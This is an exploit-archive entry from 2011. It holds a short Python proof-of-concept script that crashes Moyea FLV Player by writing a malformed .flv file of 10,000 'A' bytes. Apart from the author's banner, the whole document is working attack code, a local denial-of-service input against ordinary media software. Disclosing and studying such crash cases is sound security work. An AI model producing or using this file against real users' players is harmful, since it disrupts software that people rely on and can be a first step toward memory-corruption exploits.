id: 16749
date: 08/22/2011
title: Moyea FLV Player(.flv)Local Crash Poc
author: Angel Injection
cves: 

#!/usr/bin/python

print "#########################################################"
print "# Name: Moyea FLV Player(.flv)Local Crash Poc           #"
print "# Author: Angel Injection                               #"
print "# Email: Angel-Injection@hotmail.com                    #"
print "# home page: http://club-h.co.cc http://sec-krb.org     #"
print "#########################################################"

try :

   junk = "\x41" * 10000
   
   f = open("fuzzer.flv" ,"w")
   f.write(junk)
   f.close()
except:
    print "error"
print "<><><><><><><><><><><><><><><><><><><><><><><><><>"
print "file was created By Angel Injection successfully<>"
print "<><><><><><><><><><><><><><><><><><><><><><><><><>"



#  0day.today [2023-03-27]  #